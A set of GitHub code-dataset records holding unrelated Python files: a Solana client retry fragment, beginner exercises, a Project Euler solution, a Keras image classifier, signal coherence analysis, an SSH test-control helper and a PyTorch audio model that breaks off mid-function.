with timeout(30):\n return func(value, index)\n except Exception:\n logger.error(\n f\"solana_client_manager.py | _try_all | Failed attempt at index {index} for function {func}\"\n )\n if index < len(items) - 1:\n logger.info(\"solana_client_manager.py | _try_all | Retrying\")\n continue\n raise 
Exception(message)\n","repo_name":"chinmaisiddhartha/audius-main","sub_path":"discovery-provider/src/solana/solana_client_manager.py","file_name":"solana_client_manager.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13260525411","text":"def pay(wage, hours):\n    '''\n    (Number, Number) -> Number\n    Calculates an employee's pay (includes overtime)\n    Precondition: wage and hours are positive integers\n    '''\n\n    if hours <= 40:\n        return hours*wage\n    if(40 < hours <= 60):\n        return 40 * wage + (hours-40) * wage*1.5\n    if(hours > 60):\n        regular = 40*wage\n        overtime = 20*wage*1.5\n        superovertime = (hours-60)*wage*2\n        print(regular, overtime, superovertime)\n        return regular + overtime + superovertime\n\n\ndef rps(player1, player2):\n    '''(string, string) -> Number\n    Returns 0 if player1 and player2 tied, -1 if player1 won, and 1 if player2 won in the game of rock paper scissors\n    Precondition: both parameters are one of the following strings (R,S,P)\n    '''\n    if(player1 == player2):\n        return 0\n    if(player1 == 'R' and player2 == 'S' or player1 == 'S' and player2 == 'P' or player1 == 'P' and player2 == 'R'):\n        return -1\n    return 1\n\n\ndef is_divisible(n, m):\n    '''(number, number) -> boolean\n    Returns True if parameter1 is divisible by parameter2 and False if it's not\n    Precondition: parameter1 and parameter2 are both integers\n    '''\n    return n % m == 0\n\n\ndef is_divisible23n8(value):\n    '''(number) -> string\n    Returns \"yes\" if the parameter is divisible by both 2 and 3 but not 8 (otherwise it returns \"no\")\n    Precondition: the parameter is an integer\n    '''\n    if(is_divisible(value, 3) and is_divisible(value, 2) and not(is_divisible(value, 8))):\n        return \"yes\"\n    return \"no\"\n\n\ndef a3():\n    n = input(\"Enter 1st integer: \")\n    m = input(\"Enter 2nd integer: \")\n    if(is_divisible(int(n), int(m))):\n        print(n + \" is divisible by \" + m)\n    else:\n        print(n + \" is not divisible by \" + m)\n\n\ndef b3():\n    n = input(\"Enter an integer: \")\n    if(is_divisible23n8(int(n)) == \"yes\"):\n        print(n + \" is divisible by 2 and 3 but not 8\")\n    else:\n        print(\"It is not true that \" + n + \" is divisible by 2 and 3 but not 8\")\n\n\nif __name__ == \"__main__\":\n    # a3()\n    b3()\n","repo_name":"AdamJSoftware/iti1120","sub_path":"lab3/q0.py","file_name":"q0.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11821625702","text":"#Find the sum of all the primes below two million.\r\n\r\ndef primes_Lthan(n):\r\n    #Making sure n is an integer\r\n    n = int(n)\r\n    #Generating a list of odd integers to save time\r\n    check = list(range(3, n + 1, 2))\r\n    #As a result of the line above we gotta manually add 2 as a prime\r\n    primes = [2]\r\n    #x is going to be our index for the next part\r\n    x = 0\r\n\r\n\r\n    #Debug code:\r\n    #print( )\r\n    #print(\"range in question is 0 to \",check[-1])\r\n    #print()\r\n    #print(\"checking: \", check)\r\n    #print()\r\n\r\n    #The plan is to remove every prime once we've found it and every non-prime\r\n    # from the list of values we're checking so eventually the list of values\r\n    # we're checking will be empty\r\n    while not check == []:\r\n\r\n        #I guess we didn't need to set x above, since we'll need it back at 0\r\n        # everytime we're done combing through the list for non-primes\r\n        x = 0\r\n\r\n        #p is the smallest number left to check\r\n        p = check[0]\r\n        #and p is also prime\r\n        primes.append(p)\r\n        #the 
part where we remove the prime once we've catalogued it\r\n del check[0]\r\n\r\n #while loop used to do the combing, once x == len(check) - 1 we've reached\r\n # the last element in the list and so the first element in the list will\r\n # be prime so we go back to beginning and catalogue it\r\n while x < len(check):\r\n\r\n if check[x] % p == 0:\r\n del check[x]\r\n\r\n x += 1\r\n\r\n #Debug code:\r\n #print(x)\r\n #print(\"primes found, \",len(primes))\r\n\r\n return primes\r\n\r\nall = primes_Lthan(2000000)\r\n\r\n#Debug code:\r\n#print()\r\n#print(\"last prime found: \", all[-1])\r\n#print()\r\n#print(all)\r\n#print()\r\n\r\n#Some set-up for the next part\r\ntotal = 0\r\na = 0\r\n\r\n#Recursive loop for adding things together, another way to do this would be to\r\n# add the first value in all to total then delete it, that way you wouldn't have\r\n# to code the increasing index\r\nwhile a < len(all):\r\n\r\n total = all[a] + total\r\n a += 1\r\n\r\n #Debug code:\r\n #print(total)\r\n\r\nprint( )\r\nprint(\"the sum you're looking for is: \",total)\r\nprint( )\r\n\r\n#Run this and go get lunch or something\r\n","repo_name":"jackmitcheltree/Project_Euler_JM","sub_path":"problem_10.py","file_name":"problem_10.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3948547035","text":"import glob\r\nfrom random import shuffle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras.layers import Activation, Dropout, Flatten, Dense\r\nfrom tensorflow.keras.applications.mobilenet import preprocess_input\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img\r\nfrom tensorflow.keras import optimizers\r\n\r\n\r\ndef getLabel(filePaths):\r\n\tlabels = []\r\n\tfor img in filePaths:\r\n\t\tif 'Healthy' in img:\r\n\t\t\tlabels.append(0)\r\n\t\telif 'defects' in img:\r\n\t\t\tlabels.append(1)\r\n\r\n\tdataZip = list(zip(filePaths, labels))\r\n\tshuffle(dataZip)\r\n\tfilePaths, labels = zip(*dataZip)\r\n\treturn filePaths, labels\r\n\r\n\r\ndef split_trainTest(imgsAll, labelAll, splitRatio = 0.25):\r\n\tdataZip = list(zip(imgsAll, labelAll))\r\n\tshuffle(dataZip)\r\n\timgsAll, labelAll = zip(*dataZip)\r\n\tsplitPoint = int(len(imgsAll)*splitRatio)\r\n\r\n\ttrainImgs = imgsAll[:int(len(imgsAll) - splitPoint)]\r\n\ttrainLabel = labelAll[:int(len(imgsAll) - splitPoint)]\r\n\ttestImgs = imgsAll[int(len(imgsAll)-splitPoint):]\r\n\ttestLabel = labelAll[int(len(imgsAll)-splitPoint):]\r\n\r\n\treturn trainImgs, testImgs, trainLabel, testLabel\r\n\r\nimages, labels = getLabel(glob.glob('C:\\\\Users\\\\sbhure\\\\Desktop\\\\JBM\\\\JBMClassification2\\\\*\\\\*.jpg'))\r\n# split the images into train and test sets.\r\nX_train, X_test, y_train, y_test = split_trainTest(images, labels, splitRatio=0.25)\r\ndisplay(print(f'SHape of training dataset {len(X_train)} and shape of validation set is {len(X_test)}'))\r\n\r\nIMAGE_SIZE = (224, 224)\r\n\r\ntrain_imgs = [img_to_array(load_img(img, target_size=IMAGE_SIZE)) for img in X_train]\r\ntrain_imgs = np.array(train_imgs)\r\ntrain_labels = list(y_train)\r\nvalidation_imgs = [img_to_array(load_img(img, target_size=IMAGE_SIZE)) for img in X_test]\r\nvalidation_imgs = 
np.array(validation_imgs)\r\nvalidation_labels = list(y_test)\r\n# Scale the images as Deep learning models tend to work good with smaller input\r\n\r\nprint('Train dataset shape:', train_imgs.shape, \r\n '\\tValidation dataset shape:', validation_imgs.shape)\r\ntrain_imgs_scaled = train_imgs.astype('float32')\r\nvalidation_imgs_scaled = validation_imgs.astype('float32')\r\ntrain_imgs_scaled /= 255\r\nvalidation_imgs_scaled /= 255\r\n\r\nbatch_size = 32\r\nnum_classes = 2\r\nepochs = 30\r\ninput_shape = (224, 224, 3)\r\nimg_width, img_height = 224, 224\r\n\r\n# train_datagen = ImageDataGenerator(rescale=1./255, zoom_range=0.3, rotation_range=50,\r\n# width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, \r\n# horizontal_flip=True, fill_mode='nearest')\r\n\r\ntrain_datagen = ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n\r\n# this is the augmentation configuration we will use for testing:\r\n# only rescaling\r\nval_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator = train_datagen.flow(train_imgs_scaled, train_labels, batch_size=batch_size)\r\nval_generator = val_datagen.flow(validation_imgs_scaled, validation_labels, batch_size=batch_size//2)\r\n\r\n\r\nfrom keras.models import Model\r\nimport keras\r\nfrom keras.applications.inception_v3 import InceptionV3\r\n\r\ninception = InceptionV3(weights='imagenet', include_top=False, \r\n input_shape=(224, 224, 3))\r\n\r\noutput = inception.layers[-1].output\r\noutput = keras.layers.Flatten()(output)\r\nincept_model = Model(inception.input, output)\r\n\r\nincept_model.trainable = False\r\nfor layer in incept_model.layers:\r\n layer.trainable = False\r\n \r\n# import pandas as pd\r\n# pd.set_option('max_colwidth', -1)\r\n# layers = [(layer, layer.name, layer.trainable) for layer in incept_model.layers]\r\n# display(pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable']))\r\n \r\ndef get_bottleneck_features(model, input_imgs):\r\n features = model.predict(input_imgs, verbose=0)\r\n return features\r\n \r\ntrain_features_vgg = get_bottleneck_features(incept_model, train_imgs_scaled)\r\nvalidation_features_vgg = get_bottleneck_features(incept_model, validation_imgs_scaled)\r\n\r\nprint('Train Bottleneck Features:', train_features_vgg.shape, \r\n '\\tValidation Bottleneck Features:', validation_features_vgg.shape)\r\n\r\n\r\n\r\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, InputLayer\r\nfrom keras.models import Sequential\r\nfrom keras import optimizers\r\nfrom keras import backend as K\r\n\r\ninput_shape = incept_model.output_shape[1]\r\n\r\nmodel = Sequential()\r\nmodel.add(InputLayer(input_shape=(input_shape,)))\r\nmodel.add(Dense(524, activation='relu', input_dim=input_shape))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(64, activation=K.tanh))\r\nmodel.add(Dropout(0.1))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.1))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\nsgd = optimizers.RMSprop(lr=1e-5)\r\nmodel.compile(loss='binary_crossentropy',\r\n optimizer=sgd,\r\n metrics=['accuracy'])\r\n\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit(x=train_features_vgg, y=train_labels,\r\n validation_data=(validation_features_vgg, validation_labels),\r\n batch_size=batch_size, \r\n epochs=150,\r\n 
verbose=1)\r\n\r\nf, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))\r\nt = f.suptitle('Model Performance', fontsize=18)\r\nf.subplots_adjust(top=0.85, wspace=0.3)\r\n\r\nepoch_list = list(range(1,151))\r\nax1.plot(epoch_list, history.history['acc'], label='Train Accuracy')\r\nax1.plot(epoch_list, history.history['val_acc'], label='Validation Accuracy')\r\nax1.set_xticks(np.arange(0, 151, 10))\r\nax1.set_ylabel('Accuracy Value')\r\nax1.set_xlabel('Epoch')\r\nax1.set_title('Accuracy')\r\nl1 = ax1.legend(loc=\"best\")\r\n\r\nax2.plot(epoch_list, history.history['loss'], label='Train Loss')\r\nax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')\r\nax2.set_xticks(np.arange(0, 151, 10))\r\nax2.set_ylabel('Loss Value')\r\nax2.set_xlabel('Epoch')\r\nax2.set_title('Loss')\r\nl2 = ax2.legend(loc=\"best\")\r\n\r\nmodel.save('JBM_Classification.h5')\r\nf.savefig('JBM_Classification.png')\r\n\r\n","repo_name":"sagarbhure/JBMClassification2","sub_path":"playingwithmodel.py","file_name":"playingwithmodel.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30938309641","text":"\"\"\"\n% Sine amplitude/phase coherence analysis functions\n%\n%by chen lu\n%2021.12.1\n\"\"\"\nimport numpy as np\nfrom scipy.fftpack import fft, ifft\n\n\nclass Custom:\n    \"\"\"\n    base\n    \"\"\"\n\n    @classmethod\n    def get_coherence(cls, sig, para) -> dict:\n        \"\"\"\n        Process a sine signal, obtain amplitude/phase coherence metrics and generate calibration factors\n        Input:\n        sig is a 2-D array with one channel per row\n        para is a dict of signal parameters; it must contain fs and fc\n        para = {\n            'fs': 4e9, # sampling rate\n            'fc': 1950e6, # signal frequency\n            'RefChannel': 0, # reference channel, defaults to channel 0\n            'GenCaliFactorEn': 1, # enable generation of calibration factors, disabled by default\n        }\n        Output: uniformity is a dict with peak_amp_uniform amplitude coherence/dB, peak_phase_uniform phase coherence/° and delay_uniform delay coherence/ps\n        peak_amp raw amplitude/dB, peak_phase raw phase/°\n        cali_factor_complex normalized complex calibration factor, cali_factor_uint calibration factor (uint), cali_factor_hex hexadecimal calibration factor\n\n        \"\"\"\n        nc = sig.shape[0] # number of channels\n        nr = sig.shape[1]\n        uniformity = dict()\n        # truncate the sine signal to whole periods\n        fs = para['fs']\n        fc_orig = para['fc']\n        fc = cls.if_sample_freq(fc_orig, fs)\n        n_min = cls.non_leakage_min_number(abs(fc), fs)\n        if n_min:\n            if n_min <= nr:\n                nr = int(nr - nr % n_min) # take the largest Nr allowing whole-period truncation to avoid spectral leakage\n        sig = sig[:, :nr] # whole-period truncation\n        spec = fft(sig, nr) # FFT\n        n_spec = int(nr / 2)\n        if fc < 0:\n            amp = abs(spec[:, -n_spec:]) # take the negative-frequency spectrum\n        else:\n            amp = abs(spec[:, :n_spec]) # take the positive-frequency spectrum\n        max_index = np.argmax(amp) % n_spec\n        if max_index == 0:\n            amp_expect_zero = np.vstack((np.empty((nc, 10)), amp[:, -n_spec+10:])) # drop 10 points around zero frequency\n            max_index = np.argmax(amp_expect_zero) % n_spec\n        if fc < 0:\n            max_index = max_index + n_spec\n        if (nr % 2) == 1:\n            max_index = max_index+1\n        peak_amp = cls.mag2db(spec[:, max_index]) # extract the value at the same frequency for each channel\n        peak_phase = np.angle(spec[:, max_index])\n        uniformity['peak_amp'] = peak_amp\n        uniformity['peak_phase'] = np.degrees(peak_phase)\n        f = cls.freq(fs, nr)\n        fmax = f[max_index]\n        if para.get('RefChannel'):\n            ref_channel = para['RefChannel']\n        else:\n            ref_channel = 0 # defaults to channel 0\n\n        peak_amp_uniform = peak_amp-peak_amp[ref_channel] # amplitude coherence, relative to the reference channel\n        peak_phase_uniform = peak_phase-peak_phase[ref_channel]\n        peak_phase_uniform = np.angle(np.exp(1j * peak_phase_uniform))\n        delay_uniform = -peak_phase_uniform / (2 * np.pi * fc_orig / 1e12) # delay must be computed with the original frequency, unit: ps\n        peak_phase_uniform = np.degrees(peak_phase_uniform) # express phase coherence in degrees\n        uniformity['peak_amp_uniform'] = peak_amp_uniform\n        uniformity['peak_phase_uniform'] = peak_phase_uniform\n        uniformity['delay_uniform'] = delay_uniform\n        # uniform = np.vstack((peak_amp_uniform, peak_phase_uniform, delay_uniform, peak_amp, peak_phase)).T # coherence metrics\n\n        # generate calibration factors\n        if para.get('GenCaliFactorEn'):\n            gen_cali_factor_en = para['GenCaliFactorEn']\n        else:\n            gen_cali_factor_en = 0 # by default, do not generate calibration factors\n        if gen_cali_factor_en:\n            peak_amp_uniform = peak_amp_uniform-max(peak_amp_uniform)\n            cali_factor = 10**(peak_amp_uniform/20)*np.exp(1j*peak_phase_uniform/180*np.pi) # amplitude/phase factor of each channel\n            cali_factor = 1/cali_factor # its reciprocal is the calibration factor\n            uniformity['cali_factor_complex'] = cali_factor/max(abs(cali_factor))\n            cali_factor_uint, cali_factor = cls.float_complex_2qi(cali_factor)\n            cali_factor_hex = [0] * nc\n            for i in range(nc):\n                cali_factor_hex[i] = hex(int(cali_factor_uint[i])) # hexadecimal calibration factor\n            uniformity['cali_factor_uint'] = cali_factor_uint\n            # uniformity['cali_factor_hex'] = cali_factor_hex\n        return uniformity\n\n    @classmethod\n    def get_chirp_coherence(cls, chirp, para):\n        \"\"\"\n        Process a chirp signal and obtain delay coherence\n        Input:\n        chirp is a 2-D array with one channel per row\n        para is a dict of signal parameters; it must contain fs and fc\n        para = {\n            'fs': 4e9, # sampling rate/Hz\n            'fc': 0, # signal center frequency/Hz\n            'Bw': 1.8e9 # bandwidth/Hz\n            'Tp':10e-6 # pulse width/s\n            'RefChannel': 0, # reference channel, defaults to channel 0\n            'InterpNum': 1, # FFT interpolation factor, defaults to 100\n        }\n        Output: uniform: delay coherence/ns\n        \"\"\"\n        fs = para['fs']\n        fc = para['fc']\n        bw = para['Bw']\n        tp = para['Tp']\n        nc = chirp.shape[0]\n        nr = chirp.shape[1]\n        # window_en = bool(para['WindowEn'])\n\n        kr = bw / tp\n        # generate the MF factor and apply matched filtering\n        t_mf = np.arange(int(fs * tp)) / fs\n        mf = np.exp(1j * np.pi * kr * (t_mf - tp / 2) ** 2 + 1j * 2 * np.pi * fc * t_mf)\n        mf = np.conjugate(fft(mf, nr)) # the conjugate of the original spectrum is the MF factor\n        spec = fft(chirp, nr)\n        chirp = mf * spec # matched filtering\n        # window function\n        # if window_en:\n        # n_bw = round(bw / fs * nr) # window length computed from the spectrum\n        # window_type = para['WindowType'] # window type; if not hamming and windowing is enabled, default to a Kaiser window\n        # if window_type == 'hamming':\n        # window = windows.hamming(n_bw)\n        # else:\n        # window = windows.kaiser(n_bw, 2.5)\n        # window = np.concatenate((np.zeros(int((nr - n_bw) / 2)), window, np.zeros(int((nr - n_bw) / 2))), axis=0)\n        # chirp = chirp * ifftshift(window) # apply the window\n        chirp = ifft(chirp, nr) # back to the time domain\n\n        # interpolation\n        if para.get('InterpNum'):\n            m = int(para['InterpNum']) # interpolation factor\n        else:\n            m = 100 # default: 100x FFT interpolation\n        sig = cls.interpft(chirp, nr * m) # m-fold FFT interpolation\n        fs = fs * m # sampling rate after interpolation\n        # print('time resolution: %f ps' % (1 / fs * 1e12))\n        nr = sig.shape[1] # number of samples after interpolation\n        t = np.arange(nr) / fs\n        sig_db = cls.mag2db(abs(sig))\n        sig_db = sig_db - sig_db.max() # pulse-compression result (uniformly normalized)\n        # measure the delays\n        max_index = sig_db.argmax(axis=1) # index of the maximum of each row of sig_db\n        delay = t[max_index]\n        delay = delay * 1e9 # raw delay/ns\n        if para.get('RefChannel'):\n            ref_channel = para['RefChannel']\n        else:\n            ref_channel = 0 # reference channel defaults to 0\n        uniform = delay - delay[ref_channel]\n        return {'delay_uniform': uniform}\n\n    @classmethod\n    def float_complex_2qi(cls, complex_data, n_bit=16):\n        \"\"\" Quantize floating-point complex values and convert them to QI form\"\"\"\n        max_value = max(abs(complex_data))\n        complex_data = complex_data / max_value\n        complex_data = np.around(complex_data * (2 ** (n_bit - 1) - 1)) # quantize\n        data_real = np.real(complex_data)\n        data_imag = np.imag(complex_data)\n        data_real = data_real + (data_real < 0) * 2 ** n_bit # unsigned value of the two's complement\n        data_imag = data_imag + (data_imag < 0) * 2 ** n_bit\n        data_qi = data_imag * (2 ** n_bit) + data_real # imaginary part in the high bits\n        return data_qi, complex_data\n\n    @classmethod\n    def float_complex_2QI(cls, fc_orig, fs):\n        \"\"\" Compute the IF (intermediate-frequency) sampling frequency\"\"\"\n        fc = fc_orig\n        if fc_orig > fs / 2:\n            fc = fc_orig % fs\n            if fc > fs / 2:\n                fc = fc - fs\n        return fc\n\n    @classmethod\n    def non_leakage_min_number(cls, fc, fs):\n        \"\"\" Compute the minimum number of samples with no spectral leakage\"\"\"\n        n_min = []\n        for k in range(10000):\n            if fs / fc * (k + 1) == int(fs / fc * (k + 1)):\n                n_min = fs / fc * (k + 1) # minimum number of samples guaranteeing no leakage\n                break\n        return n_min\n\n    @classmethod\n    def if_sample_freq(cls, fc_orig, fs):\n        fc = fc_orig\n        if fc_orig > fs / 2:\n            fc = fc_orig % fs\n            if fc > fs / 2:\n                fc = fc - fs\n        return fc\n\n    @classmethod\n    def freq(cls, fs, n):\n        \"\"\" Build the analog frequency axis; it matches the FFT'd signal, with the first point at zero frequency\"\"\"\n        f = np.arange(n)\n        f = f / n * fs\n        mod = n % 2\n        if mod == 0:\n            n = int(n / 2)\n            f[-n:] = f[-n:] - fs\n        else:\n            n = int(-(n + 1) / 2)\n            f[-n] = f[-n] - fs\n        return f\n\n    @classmethod\n    def interpft(cls, x, ny):\n        \"\"\"FFT interpolation of a row-wise array. x: original signal, ny: number of points after interpolation\"\"\"\n        na = x.shape[0]\n        nr = x.shape[1]\n        a = fft(x, nr)\n        nyqst = int(np.ceil((nr + 1) / 2))\n        b = np.hstack((a[:, 0:nyqst], np.zeros((na, ny - nr)), a[:, nyqst:nr]))\n        b[:, nyqst - 1] = b[:, nyqst - 1] / 2\n        b[:, nyqst + ny - nr - 1] = b[:, nyqst - 1]\n        y = ifft(b, ny)\n        y = y * ny / nr\n        return y\n\n    @classmethod\n    def mag2db(cls, y):\n        \"\"\"Same as MATLAB's mag2db; to avoid failing on non-positive input, negative values take their modulus and 0 becomes 0.000001, i.e. -120dB\"\"\"\n        y = abs(y)\n        y[y == 0] = 0.000001\n        ydb = 20 * np.log10(y)\n        return ydb\n","repo_name":"sunningxiao/RFSdemo","sub_path":"ui/附加功能/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40359999790","text":"import subprocess\nimport time\nimport os\nimport select\n\nclass SSHControl(object):\n\n    def __init__(self, host=None, timeout=300, logfile=None):\n        self.host = host\n        self.timeout = timeout\n        self._starttime = None\n        self._out = ''\n        self._ret = 126\n        self.logfile = logfile\n        self.ssh_options = [\n            '-o', 'UserKnownHostsFile=/dev/null',\n            '-o', 'StrictHostKeyChecking=no',\n            '-o', 'LogLevel=ERROR'\n            ]\n        self.ssh = ['ssh', '-l', 'root'] + self.ssh_options\n\n    def log(self, msg):\n        if self.logfile:\n            with open(self.logfile, \"a\") as f:\n                f.write(\"%s\\n\" % msg)\n\n    def _internal_run(self, cmd):\n        # We need this for a proper PATH\n        cmd = \". /etc/profile; \" + cmd\n        command = self.ssh + [self.host, cmd]\n        self.log(\"[Running]$ %s\" % \" \".join(command))\n        self._starttime = time.time()\n        # ssh hangs without os.setsid\n        proc = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=os.setsid)\n        return proc\n\n    def run(self, cmd, timeout=None):\n        \"\"\"Run cmd and get its return code and output.\n        Let it run for timeout seconds and then terminate/kill it,\n        if time is 0 will let cmd run until it finishes.\n        Time can be passed to here or can be set per class instance.\"\"\"\n\n        if self.host:\n            sshconn = self._internal_run(cmd)\n        else:\n            raise Exception(\"Remote IP/host hasn't been set, I can't run ssh without one.\")\n\n        # run the command forever\n        if timeout == 0:\n            output = sshconn.communicate()[0]\n        else:\n            # use the default timeout\n            if timeout is None:\n                tdelta = self.timeout\n            # use the specified timeout\n            else:\n                tdelta = timeout\n            endtime = self._starttime + tdelta\n            output = ''\n            eof = False\n            while time.time() < endtime and not eof:\n                if select.select([sshconn.stdout], [], [], 5)[0] != []:\n                    data = os.read(sshconn.stdout.fileno(), 1024)\n                    if not data:\n                        sshconn.stdout.close()\n                        eof = True\n                    else:\n                        output += data\n                        endtime = time.time() + tdelta\n\n            # process hasn't returned yet\n            if sshconn.poll() is None:\n                sshconn.terminate()\n                time.sleep(3)\n                try:\n                    sshconn.kill()\n                except OSError:\n                    pass\n                output += \"\\n[!!! SSH command killed - no output for %d seconds. 
Total running time: %d seconds.\" % (tdelta, time.time() - self._starttime)\n\n self._ret = sshconn.poll()\n # strip the last LF so we can test the output\n self._out = output.rstrip()\n self.log(\"%s\" % self._out)\n self.log(\"[SSH command returned after %d seconds]: %s\" % (time.time() - self._starttime, self._ret))\n return (self._ret, self._out)\n\n def _internal_scp(self, cmd):\n cmd = ['scp'] + self.ssh_options + cmd\n self.log(\"[Running SCP]$ %s\" % \" \".join(cmd))\n self._starttime = time.time()\n scpconn = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=os.setsid)\n out = scpconn.communicate()[0]\n ret = scpconn.poll()\n self.log(\"%s\" % out)\n self.log(\"[SCP command returned after %d seconds]: %s\" % (time.time() - self._starttime, ret))\n if ret != 0:\n # we raise an exception so that tests fail in setUp and setUpClass without a need for an assert\n raise Exception(\"Error running %s, output: %s\" % ( \" \".join(cmd), out))\n return (ret, out)\n\n def copy_to(self, localpath, remotepath):\n actualcmd = [localpath, 'root@%s:%s' % (self.host, remotepath)]\n return self._internal_scp(actualcmd)\n\n def copy_from(self, remotepath, localpath):\n actualcmd = ['root@%s:%s' % (self.host, remotepath), localpath]\n return self._internal_scp(actualcmd)\n\n def get_status(self):\n return self._ret\n\n def get_output(self):\n return self._out\n","repo_name":"gyanranjan/securebox","sub_path":"meta/lib/oeqa/utils/sshcontrol.py","file_name":"sshcontrol.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"12220832340","text":"#!/usr/bin/env python\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom spectogram import spectogram\nimport numpy as np\nimport globals\nfrom dataloader import loadWav, writeWav, one_hot_decode\nfrom data import LazyDataset\nfrom os import walk\nfrom random import randrange\n\nlearning_rate = 1e-4\nCUDA = True\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.iteration = 1\n\n def train(self, data, training=True, filename=''):\n global iteration\n\n # Get Input and target from data\n if torch.cuda.is_available() and CUDA:\n inputVector = data[0].cuda()\n target = data[1].cuda()\n else:\n inputVector = data[0] \n target = data[1]\n\n # Encapsulate in PyTorch Variable\n x = Variable(inputVector)\n y = Variable(target, requires_grad=False).squeeze()\n\n # Run input through model and compute loss\n y_pred = self(x).squeeze()\n loss = self.loss_fn(y_pred, y)\n\n if self.iteration % 100 == 0 and True:\n print(self.iteration if training else '', filename, loss.data[0])\n if self.iteration % 200 == 0 and True:\n print('\\ttarget = %s prediction = %s' % (y.shape, y_pred.shape))\n print('\\ttarget = %s prediction = %s\\n' % (y.data[0], y_pred.data[0]))\n\n # If training then backwards propagate, otherwise save prediction for output\n if training:\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.iteration += 1\n\n return y_pred.data\n\n def fileOutput(self, inputFile, outputFile, testFile=None):\n backup = self.iteration\n self.iteration = 1\n CurrentData = LazyDataset(loadWav(inputFile), \n procData=loadWav(testFile) if testFile != None else None) # test file used to calculate loss if that's important to you (optional)\n output = []\n for i, b in enumerate(CurrentData.sequentialSampler()):\n pred = 
self.train(b, training=False, filename=inputFile).squeeze().tolist()\n output += pred\n writeWav(np.array(output), outputFile)\n spectogram(outputFile)\n self.iteration = backup\n\nclass LSTMModel(Model):\n def __init__(self):\n super(LSTMModel, self).__init__()\n # Model Architecture\n self.lstm1 = nn.LSTM(globals.INPUT_VECTOR_SIZE, 800, 8)\n self.fc = nn.Sequential(\n nn.Linear(800,1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.lstm1(x)\n x = x[0]\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass ConvModel(Model):\n def __init__(self):\n super(ConvModel, self).__init__()\n # Model Architecture\n ivs = globals.INPUT_VECTOR_SIZE\n ovs = 2**16\n self.conv = nn.Sequential(\n nn.Conv1d(64, 800, 1), nn.ReLU(),\n nn.Conv1d(800, 800, 1), nn.ReLU(),\n nn.Conv1d(800, 700, 1), nn.ReLU(),\n nn.Conv1d(700, 500, 1), nn.ReLU(),\n nn.Conv1d(500, 250, 1), nn.ReLU(),\n nn.Conv1d(250, 100, 1), nn.ReLU(),\n nn.MaxPool1d(1))\n self.fc = nn.Sequential(\n nn.Linear(100, 50), nn.ReLU(),\n nn.Linear(50, 25), nn.ReLU(),\n nn.Linear(25, 10), nn.ReLU(),\n nn.Linear(10, 1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.conv(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass LinearModel(Model):\n def __init__(self):\n super(LinearModel, self).__init__()\n # Model Architecture\n self.lin1 = nn.Sequential(nn.Linear(1, 64), nn.ReLU(),\n nn.Linear(64, 32), nn.ReLU(),\n nn.Linear(32, 16), nn.ReLU(),\n nn.Linear(16, 1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.lin1(x)\n return x\n\ndef main():\n def loadData():\n getFiles = lambda x : ([ '%s/%s' % (x, l) \n for l in list(walk(x))[0][2] if l.endswith('.wav')])\n\n dryFiles = getFiles('./dataset')\n wetFiles = getFiles('./dataset/processed')\n\n dryData = []\n wetData = []\n\n # Iterate over files and processed files\n for file, pFile in zip(dryFiles, wetFiles):\n dryData = dryData + list(loadWav(file))\n wetData = wetData + 